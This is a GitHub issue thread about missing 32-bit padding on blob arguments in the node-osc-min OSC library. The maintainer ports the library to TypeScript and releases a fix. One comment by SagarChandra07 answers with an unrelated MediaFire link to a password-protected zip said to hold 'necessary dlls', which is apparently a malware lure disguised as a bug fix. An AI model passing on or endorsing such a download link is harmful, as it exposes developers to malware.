### ISSUE TITLE
Blob type doesn't seem spec compliant?

### ISSUE THREAD

**Issue by jwetzell** [russellmcc/node-osc-min#21]
I noticed that messages with the blob arguments are not being properly formatted it seems. Specifically the padding on the blob data is missing and may just not be accounted for (I checked the source but am no coffeescript expert). The blob data should be padded similar to strings into 32 bit aligned "chunks" with null bytes as padding. I did take a crack at adding it in locally but I'm not sure if there is a more coffeescript route to do this.

Really appreciate this library as it's one of the only ones that doesn't implement the communication side of things and just lets me deal with the bytes!!

**Comment by SagarChandra07** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme
I put the necessary dlls in the archive

**Comment by russellmcc** [comment]
Thanks for the contribution!  I actually wasn't aware there was interest in this library, it hadn't been touched in quite some time!  I did a quick port of the library to typescript, and will release a 2.0 with this fix soon

**Comment by russellmcc** [comment]
FYI the new version has been released, feel free to open an issue if you have any problems upgrading.

**Comment by jwetzell** [comment]
Ha, I've also got my own version I made in the last couple weeks in Typescript. Would be interested in jumping back into an existing project. I just really dislike the osc libraries that force the communication stuff (TCP, UDP, etc.) so this library has always been my go-to.
